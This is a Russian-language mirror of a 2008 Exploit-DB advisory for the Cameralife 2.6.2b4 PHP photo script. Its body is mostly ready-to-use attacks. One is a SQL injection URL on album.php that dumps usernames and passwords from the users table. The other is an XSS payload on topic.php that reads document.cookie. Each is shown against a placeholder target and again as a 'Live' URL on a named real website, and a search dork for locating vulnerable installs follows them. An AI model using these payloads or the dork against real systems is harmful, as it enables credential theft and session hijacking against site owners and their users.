- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6710
- Проверка EDB
-
- Пройдено
- Автор
- BACKDOOR
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6087 cve-2008-6086
- Дата публикации
- 2008-10-09
Код:
Cameralife 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities
Script:Cameralife 2.6.2b4
Download:http://nchc.dl.sourceforge.net/sourceforge/fdcl/cameralife-2.6.2b4.zip
Author:BackDoor
Bug 1;album.php Remote SQL Injection Vulnerability
Exploit:www.target.com/scriptpath/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
Live
http://chrisnolan.org/cameralife/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
Bug 2;topic.php XSS Vulnerability
Exploit:www.target.com/scriptpath/topic.php?name="><script>alert(document.cookie)</script>
Live
http://chrisnolan.org/cameralife/topic.php?name="><script>alert(document.cookie)</script>
Dork:inurl:"cameralife/index.php"
BackDoor Cyber-Security.TIM //Lojistik
# milw0rm.com [2008-10-09]- Источник
- www.exploit-db.com
